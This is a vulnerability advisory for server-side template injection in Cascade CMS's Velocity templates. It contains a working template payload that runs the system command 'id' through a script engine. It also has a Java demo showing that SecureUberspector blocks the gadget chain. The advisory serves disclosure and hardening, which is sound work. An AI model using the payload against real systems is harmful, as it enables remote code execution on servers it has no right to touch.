August 19, 2020

GHSL-2020-076: Server-Side Template Injection in Cascade CMS

Alvaro Muñoz

Summary

A user with privileges to edit templates may execute arbitrary Java code or run arbitrary system commands with the same privileges as the account running Cascade CMS.

Product

Cascade CMS

Tested Version

Cascade CMS v8.14.cloud5 (57164371131571924e45d18fbd2725f3d8d124d4)

Details

Server-Side Template Injection (Velocity)

Cascade CMS does not configure Velocity's SecureUberspector (the runtime.introspector.uberspect setting). With Velocity's default uberspector, a template may call any public method on any object placed in the template context, including getClass(); from the resulting java.lang.Class object it can reach the static Class.forName() and instantiate arbitrary classes. An attacker who is able to create or modify templates can therefore execute arbitrary Java code and achieve remote code execution. For example, the following template obtains a javax.script engine through that chain and uses it to run the system command id:

#set($scriptEngine = $currentPage.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js'))
${scriptEngine.eval("var x=new java.lang.ProcessBuilder('id'); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())")}

In addition, Cascade CMS exposes the Velocity Tools FieldTool to templates as the $_FieldTool variable. This tool resolves classes by name and returns the values of their public static fields, so a template author can read any public static field of any class reachable through the Velocity ClassLoader.
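The Java program below is an added example and is not code from the advisory or from Cascade CMS. It renders a benign variant of the gadget chain above (getClass() to Class.forName() to a static method call) twice: once with Velocity's default uberspector and once with SecureUberspector selected through runtime.introspector.uberspect, which is the setting the advisory reports missing. The $currentPage context object is a stand-in for whatever Cascade exposes (any object works, since every object has getClass()); velocity-engine-core 2.x on the classpath is assumed.

```java
import java.io.StringWriter;

import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.VelocityEngine;
import org.apache.velocity.runtime.RuntimeConstants;

/**
 * Added example (not Cascade CMS or advisory code): shows what the missing
 * SecureUberspector setting changes for a template-author-controlled template.
 */
public class VelocitySstiDemo {

    // Benign variant of the advisory's chain. The advisory payload follows the same
    // path but swaps java.lang.System for javax.script.ScriptEngineManager and then
    // runs ProcessBuilder from the script engine.
    static final String TEMPLATE =
        "#set($sys = $currentPage.class.forName('java.lang.System'))" +
        "$sys.getProperty('java.version')";

    /** Renders TEMPLATE, optionally with SecureUberspector, and returns the output. */
    static String render(boolean secure) {
        VelocityEngine ve = new VelocityEngine();
        if (secure) {
            // RuntimeConstants.UBERSPECT_CLASSNAME == "runtime.introspector.uberspect".
            // SecureUberspector refuses method calls on the classes listed under
            // introspector.restrict.classes (java.lang.Class, ClassLoader, Runtime,
            // System, Thread, ...) and on the java.lang.reflect package, except
            // Class.getName(). $currentPage.class still yields a Class object, but
            // forName() on it is denied and resolves to null.
            ve.setProperty(RuntimeConstants.UBERSPECT_CLASSNAME,
                "org.apache.velocity.util.introspection.SecureUberspector");
        }
        ve.init();

        VelocityContext ctx = new VelocityContext();
        // Hypothetical context object standing in for Cascade's $currentPage.
        ctx.put("currentPage", new Object());

        StringWriter out = new StringWriter();
        ve.evaluate(ctx, out, "ssti-demo", TEMPLATE);
        return out.toString();
    }

    /** True when the static call went through, i.e. the engine is exploitable. */
    static boolean chainSucceeded(String rendered) {
        return rendered.equals(System.getProperty("java.version"));
    }

    public static void main(String[] args) {
        String unsafe = render(false);
        String safe = render(true);
        System.out.println("default uberspector: " + unsafe);
        System.out.println("SecureUberspector  : " + safe);
        // Default: the JVM version string (forName and the static call succeeded).
        // Secure: $sys is null, so the reference is echoed back unrendered, and
        // Velocity logs a warning that the call on java.lang.Class was refused.
        System.out.println("default config exploitable: " + chainSucceeded(unsafe));
        System.out.println("secure config exploitable : " + chainSucceeded(safe));
    }
}
```

Selecting SecureUberspector is the documented Velocity hardening for untrusted template authors, but it only restricts method resolution inside the engine: objects and tools deliberately placed in the context, such as a tool that loads classes by name, are still reachable and need to be reviewed on their own.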

Impact

This issue may lead to Remote Code Execution with the privileges of the account running Cascade CMS.

Coordinated Disclosure Timeline

  • 04/17/2020: Sent report to vendor.
  • 04/17/2020: Vendor acknowledges the issue.
  • 04/27/2020: Issue is fixed.

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com; please include GHSL-2020-076 in any communication regarding this issue.